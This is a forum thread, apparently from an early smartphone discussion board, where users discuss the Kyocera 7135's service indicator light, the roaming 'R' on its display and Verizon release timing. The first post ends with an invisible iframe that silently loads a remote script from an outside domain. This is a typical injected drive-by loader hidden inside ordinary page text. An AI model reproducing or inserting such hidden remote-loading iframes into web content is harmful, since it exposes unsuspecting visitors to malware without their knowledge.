+ Reply to Thread

Service indicator light not working?

So I finally bit the bullet and ordered it-- came yesterday and all is well except I fear I may have a problem with the flashing light indicating service. No problem activating with Verizon (I have single rate national plan). I'm sitting here, with 3 bars showing, but NO light at all. If I make a call, it is solid green. If searching, it is flashing red. Am I missing something here??-- shouldn't the light be flashing green with normal digital service??<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Nope, you are not missing something. Sounds like it is working like it should.

Andy

I thought I had seen that the 7135 functions like the 6035 in this regard-- ie., flashing green light lets you know the phone is on and receiving in the "home" (or non-roaming) area. But you're saying that the normal state is for the light to be totally off and it only flashes when there's a call? Does the phone need to be opened to know if you're roaming, or does an "R" show up in the LCD? Thanks--

READ THE FAQ's

See http://www.smartphonesource.com/vbul...&threadid=4755

Only thing that isn't answered is whether the LCD shows that you are roaming. If it is documented, I can't find it on a quick search, and I haven't roamed with my phone yet, so I can't answer it.

Alan

Yes, the LCD shows an R if you are roaming. Experienced it just a few nights ago.

Richard

Thanks!-- I did search, but only on the 7135 Discussion, not the FAQ (mea culpa). I have to tell you (like eveyone doesn't already know), this is really one awesome palm/phone. The transition from the Treo (yes, back from the dark side) was easy, and this phone offers *so* much more. One unexpected surprise is that it reall is small enough to go in a shirt pocket, and at least for me, is not signficantly different than the treo (which is good that way as well). Reception is excellent. And the MP3 quality is quite good even with the speaker. I heard from our verizon corporate rep today that the verizon release is now set for the end of February at the earliest (ie, if all further testing goes well), so I wouldn't be surprised if the release isn't till March sometime.